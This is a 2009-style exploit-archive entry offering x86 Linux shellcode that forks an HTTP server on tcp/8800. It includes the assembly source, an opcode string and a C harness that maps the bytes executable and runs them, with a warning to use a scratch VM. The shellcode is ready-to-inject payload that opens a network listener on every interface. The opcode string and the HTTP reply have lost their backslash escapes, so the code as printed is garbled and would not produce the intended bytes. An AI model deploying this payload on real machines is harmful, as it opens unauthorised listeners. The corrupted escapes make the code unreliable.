
# Title : linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes
# Published : 2009-09-15
# Author : XenoMuta


/*
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ / __ / __ / /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|____/_/ /_/____/_/  /_/__,_/__/__,_/

 xenomutax40phreakerx2enet
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

 Description:
 a linux/x86 shellcode that forks a HTTP Server on port tcp/8800

 OS: Linux
 Arch: x86
 Length: 166 bytes
 Author: XenoMuta

 hola at:
  str0k3, garay, fr1t0l4y, emra.
  - God bless you all -
 
==== SOURCE CODE ====
.globl _start
_start:
	xor %eax, %eax
	mov $0x02, %al
	int $0x80
	test %eax, %eax
	jz socket
	xor %eax, %eax
	incb %al
	int $0x80
txt:
	pop %ecx
	movb $27, %dl
	int $0x80

close:
	movb $0x6, %al
	mov %esi, %ebx
	int $0x80

exit:
	mov $0x01, %al
	xor %ebx, %ebx
	int $0x80

socketcall:
	pop %esi
	mov $0x66, %al
	incb %bl
	mov %esp, %ecx
	int $0x80
	jmp *%esi

socket:
	cltd
	xor %eax, %eax
	xor %ebx, %ebx
	push $0x6
	push $0x1
	push $0x2
	call socketcall

bind:
	mov %eax, %edi
	xor %edx, %edx
	push %edx
	pushw $0x6022
	pushw %bx
	mov %esp, %ecx
	push $0x10
	push %ecx
	push %edi
	call socketcall

listen:
	inc %bl
	push $0x05
	push %edi
	call socketcall

accept:
	xor %ecx, %ecx
	push %edx
	push %edx
	push %edi
	call socketcall
	
fork:
	mov %eax, %esi
	xor %eax, %eax
	mov $0x02, %al
	int $0x80
	test %eax, %eax
	jz write

	xor %eax, %eax
	mov $0x06, %al
	mov %esi, %ebx
	int $0x80

	xor %eax, %eax
	xor %ebx, %ebx
	mov $0x04, %bl
	jmp accept

write:
	mov %esi, %ebx
	mov $0x04, %al
	call txt
	.string "HTTP/1.0 200rnrn<h1>:)</h1>"
==== SOURCE CODE ====
*/
char shellcode[] = "x31xc0xb0x02xcdx80x85xc0x74x22x31xc0xfexc0xcdx80x59xb2x1bxcdx80xb0x06x89xf3xcdx80xb0x01x31xdbxcdx80x5exb0x66xfexc3x89xe1xcdx80xffxe6x99x31xc0x31xdbx6ax06x6ax01x6ax02xe8xe5xffxffxffx89xc7x31xd2x52x66x68x22x60x66x53x89xe1x6ax10x51x57xe8xcfxffxffxffxfexc3x6ax05x57xe8xc5xffxffxffx31xc9x52x52x57xe8xbbxffxffxffx89xc6x31xc0xb0x02xcdx80x85xc0x74x10x31xc0xb0x06x89xf3xcdx80x31xc0x31xdbxb3x04xebxdax89xf3xb0x04xe8x85xffxffxffx48x54x54x50x2fx31x2ex30x20x32x30x30x0dx0ax0dx0ax3cx68x31x3ex3ax29x3cx2fx68x31x3e";

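#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/*
 * Test harness: print the payload length, then run it.
 *
 * The published harness jumped straight at shellcode[] in .data, which only
 * works when the data segment is executable; on current toolchains it is
 * not (NX / W^X) and the call faults. The bytes are therefore copied into
 * an anonymous RWX mapping first. Do not expect a return: the payload forks,
 * the parent side calls exit(2) immediately and the child keeps serving
 * tcp/8800 on every interface, so run this only in a scratch VM/container.
 *
 * Returns 0 if the payload somehow hands control back, 1 if mmap() fails.
 */
int main(void)
{
	size_t len = strlen(shellcode);

	printf("Length: %zu bytes\n", len);

	void *page = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
	                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED) {
		perror("mmap");
		return 1;
	}
	memcpy(page, shellcode, len);

	void (*sc)(void) = (void (*)(void))page;
	sc();
	return 0;
}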
